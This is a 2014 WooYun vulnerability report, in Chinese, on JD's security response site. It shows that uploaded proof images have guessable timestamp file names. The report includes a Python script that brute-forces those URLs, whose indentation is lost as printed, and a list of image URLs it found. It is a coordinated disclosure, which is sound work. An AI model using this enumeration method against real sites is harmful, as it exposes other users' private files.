京东JSRC各种漏洞泄漏

漏洞详情

披露状态:

2014-02-27: 细节已通知厂商并且等待厂商处理中
2014-03-04: 厂商已经确认,细节仅向厂商公开
2014-03-14: 细节向核心白帽子及相关领域专家公开
2014-03-24: 细节向普通白帽子公开
2014-04-03: 细节向实习白帽子公开
2014-04-13: 细节向公众公开

简要描述:

好久没在wooyun刷漏洞了,嘻唰唰洗刷刷嘻唰唰洗刷刷

详细说明:

提交漏洞上传图片证明时,通过上传抓包获得图片地址



http://security.jd.com///Public//userfile//201402//27100414_.jpg





1.jpg





对URL分析发现重命名有规律可循

201402 //2014年02月

27100414 //27日10点04分14秒



根据这个规则利用下面的python代码探测图片地址



__author__ = 'bingsec'

import datetime,time
import httplib,urllib2
import socket

def daterange(start_date, end_date):
for n in range(int ((end_date - start_date).days)):
yield start_date + datetime.timedelta(n)

def get_status_code(host, path=""):
""" This function retreives the status code of a website by requesting
HEAD data from the host. This means that it only requests the headers.
If the host cannot be reached or something else goes wrong, it returns
None instead.
"""
try:
conn = httplib.HTTPConnection(host)
conn.request("HEAD", path)
return conn.getresponse().status
except StandardError:
return None

def GetResponse(url):
try:
code = get_status_code(taget_url, url)
if code == 200:
print "success:" + taget_url + url
WritePath(taget_url + url, "jd.txt")
else:
print 'error: ' + taget_url + url
except: pass

def WritePath(content, filename):
writefile = file(filename, "a+")
writefile.write(content + "\r\n")
writefile.close()

start_date = datetime.datetime(2013, 11, 1)
end_date = datetime.datetime(2014, 1, 31)
taget_url = 'security.jd.com'

for single_date in daterange(start_date, end_date):
for hour in range(12, 24 + 1):
for m in range(2, 60):
for s in range(10, 60):
str = '/Public/userfile/'+ time.strftime('%Y%m/%d' + '%02d%02d%02d'%(hour, m, s) + '_.jpg', single_date.timetuple())
GetResponse(str)

漏洞证明:

成功探测出的漏洞图片地址

security.jd.com/Public/userfile/201311/02212940_.jpg 
security.jd.com/Public/userfile/201311/03180552_.jpg
security.jd.com/Public/userfile/201311/03180558_.jpg
security.jd.com/Public/userfile/201311/03182134_.jpg
security.jd.com/Public/userfile/201311/04122622_.jpg
security.jd.com/Public/userfile/201311/04123621_.jpg
security.jd.com/Public/userfile/201311/04123638_.jpg
security.jd.com/Public/userfile/201311/04123645_.jpg
security.jd.com/Public/userfile/201311/04123646_.jpg
security.jd.com/Public/userfile/201311/04123647_.jpg
security.jd.com/Public/userfile/201311/04123648_.jpg
security.jd.com/Public/userfile/201311/04123651_.jpg
security.jd.com/Public/userfile/201311/04123652_.jpg
security.jd.com/Public/userfile/201311/04123653_.jpg
security.jd.com/Public/userfile/201311/04123654_.jpg
security.jd.com/Public/userfile/201311/04123655_.jpg
security.jd.com/Public/userfile/201311/04123656_.jpg
security.jd.com/Public/userfile/201311/04123736_.jpg
security.jd.com/Public/userfile/201311/04123757_.jpg
security.jd.com/Public/userfile/201311/04123859_.jpg
security.jd.com/Public/userfile/201311/04124747_.jpg
security.jd.com/Public/userfile/201311/04133119_.jpg
security.jd.com/Public/userfile/201311/04142047_.jpg
security.jd.com/Public/userfile/201311/04143954_.jpg
security.jd.com/Public/userfile/201311/04145024_.jpg
security.jd.com/Public/userfile/201311/04152835_.jpg
security.jd.com/Public/userfile/201311/04153038_.jpg
security.jd.com/Public/userfile/201311/04170626_.jpg
security.jd.com/Public/userfile/201311/04170713_.jpg
security.jd.com/Public/userfile/201311/08132833_.jpg
security.jd.com/Public/userfile/201311/08141610_.jpg
security.jd.com/Public/userfile/201311/08141832_.jpg
security.jd.com/Public/userfile/201311/08143320_.jpg
security.jd.com/Public/userfile/201311/08143427_.jpg
security.jd.com/Public/userfile/201311/19121112_.jpg
security.jd.com/Public/userfile/201311/19180857_.jpg
security.jd.com/Public/userfile/201311/21150513_.jpg
security.jd.com/Public/userfile/201311/21150723_.jpg
security.jd.com/Public/userfile/201311/22142454_.jpg
security.jd.com/Public/userfile/201311/22145019_.jpg
security.jd.com/Public/userfile/201311/24171532_.jpg
security.jd.com/Public/userfile/201312/17190859_.jpg
security.jd.com/Public/userfile/201401/17161531_.jpg
security.jd.com/Public/userfile/201401/17162117_.jpg
security.jd.com/Public/userfile/201401/17162647_.jpg





2.jpg





3.jpg





4.jpg

修复方案:

版权声明:转载请注明来源 bing@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-03-04 09:16

厂商回复:

非常感谢您对京东的关注!

最新状态:

暂无


漏洞评价: